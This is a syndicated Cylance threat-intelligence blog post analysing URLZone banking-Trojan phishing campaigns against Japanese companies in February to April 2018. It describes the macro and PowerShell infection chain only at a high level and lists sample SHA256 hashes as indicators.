Threat Spotlight: URLZone Malware Campaigns Targeting Japan

The malware known as URLZone has plagued security professionals for nearly a decade, and now it is back for an encore performance in 2018. First detected as a banking Trojan in 2009, this malware has re-emerged in several recent threat campaigns.

URLZone underscores how many rudimentary malware infection strategies are as effective today as they were a decade ago. Victims of URLZone are first phished, then enticed to open an infected attachment which downloads the malware payload.

This particular Trojan leveraged a variety of malicious behaviors, from process-hollowing to downloading additional malware in the most recent series of attacks targeting Japanese companies.

URLZone Analyzed

URLZone remains a persistent threat to infrastructure almost a decade after its first appearance. Its long track record of success makes it a favored malicious code among threat actors. Cylance observed active distribution campaigns involving this malware between February and April of 2018. The vast majority of these URLZone attacks targeted Japan.

We analyzed URLZone samples discovered from February to April, as shown in Table 1:

Date

SHA256

Feb. 2018

6722651E7C144658933C7EA6D1011D2662CDA29CF03A3737BCABD4B4ED54710D

79051CFE2B37DDC439C18BC0C1856958DD026A7A6DD0A24DE4222D91DBFDA22C

47F23E26E7258DAF6F4669F0183187C3435208675E64F1FA9521BEBED38A9D61

Mar. 2018

192DB4F6BCAE16A78C0C7544A3653A597C4CE05F8B8773F2553414C42BDDAA51

03870D02ACC6E280B035822949DC6CC3B576CBC487497D0F358C3E05D969A23A

6FD04B0C6EA295F5617F83896B8CE243909A77A9DA4E876C0F8E6E414BDEFFC3

0881B599357FB4CEC8B477696C6B34645F36B48BC457DC7CE5E7978DA3C3BF10

Apr. 2018

81A9BEB4209250FE7169805E60AD1915BDAAF45926D0D82E820B36E0515F6831

A041C5E65A76301656BE927D2BA92BC5A42567D7EE649E4A0C767D78254B29F7

95B8F7277E3965872577AEBFC4D1A0A5738E6C814CBEB9AEF85B495B36DABAE8

Table 1: 10 URLZone samples detected during this campaign

Figure 1 below shows the number of companies where URLZone was found per day between Japan and non-JP regions. We observed a spike on March 15, with eight victim companies. As you can see, URLZone mainly attacks Japanese companies during this period:

Figure 1: Japan (JP) and non-JP URLZone detections, February-April 2018

URLZone relies on phishing emails and infected attachments to compromise a system. It uses macro code from corrupt MS Office documents to download and execute a malicious executable file, as shown in Figure 2 and Figure 3:

Figure 2: Encoded macro code

Figure 3: Deobfuscated macro code includes PowerShell Script

(Read more...)

*** This is a Security Bloggers Network syndicated blog from Cylance Blog authored by Cylance Threat Guidance Team. Read the original post at: https://threatvector.cylance.com/en_us/home/threat-spotlight-urlzone-malware-campaigns-targeting-japan.html